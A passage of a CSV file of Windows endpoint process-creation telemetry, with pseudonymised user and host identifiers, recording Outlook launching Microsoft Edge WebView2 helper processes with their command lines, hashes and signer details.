Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer
+858,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.140405600+00:00,2021-06-23 01:31:38.229035500+00:00,7d940ed0-6c70-46e6-a19f-266e96634a30,computerpii_0a470890c60768167990033d701e7bd881398861,158644,False,10.7740.19041.1052,False,11540474045171845,,11540474045172468,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+859,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:10.000929900+00:00,9012,msedgewebview2.exe,"""msedgewebview2.exe"" --type=crashpad-handler --user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe"" --annotation=plat=Win64 ""--annotation=prod=Edge WebView2"" --annotation=ver=91.0.864.54 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x108,0x7ffbde0806f8,0x7ffbde080708,0x7ffbde080718",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.142701600+00:00,2021-06-23 01:31:38.229085600+00:00,8dfbeb05-764a-4d2a-8548-61c62146f2c4,computerpii_0a470890c60768167990033d701e7bd881398861,158645,False,10.7740.19041.1052,False,11540474045172468,,11540474045172469,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+860,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:10.250710800+00:00,17620,msedgewebview2.exe,"""msedgewebview2.exe"" --type=gpu-process --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.322098400+00:00,2021-06-23 01:31:38.229237200+00:00,68863d9c-e729-4b20-ba6c-9af0c26b4fbf,computerpii_0a470890c60768167990033d701e7bd881398861,158648,False,10.7740.19041.1052,False,11540474045172468,,11540474045172470,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+861,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:10.261055800+00:00,18184,msedgewebview2.exe,"""msedgewebview2.exe"" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --mojo-platform-channel-handle=2016 /prefetch:3",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.323323800+00:00,2021-06-23 01:31:38.229288100+00:00,de98684d-0af0-48b9-a274-da992e460f4e,computerpii_0a470890c60768167990033d701e7bd881398861,158649,False,10.7740.19041.1052,False,11540474045172468,,11540474045172471,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+862,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:10.297609200+00:00,13916,msedgewebview2.exe,"""msedgewebview2.exe"" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --mojo-platform-channel-handle=2788 /prefetch:8",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:30:10.331382300+00:00,2021-06-23 01:31:38.229341500+00:00,2549cb6c-3aba-4e14-832c-71cc4a682b5c,computerpii_0a470890c60768167990033d701e7bd881398861,158650,False,10.7740.19041.1052,False,11540474045172468,,11540474045172472,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+863,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:30:10.409192200+00:00,2868,msedgewebview2.exe,"""msedgewebview2.exe"" --type=renderer --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 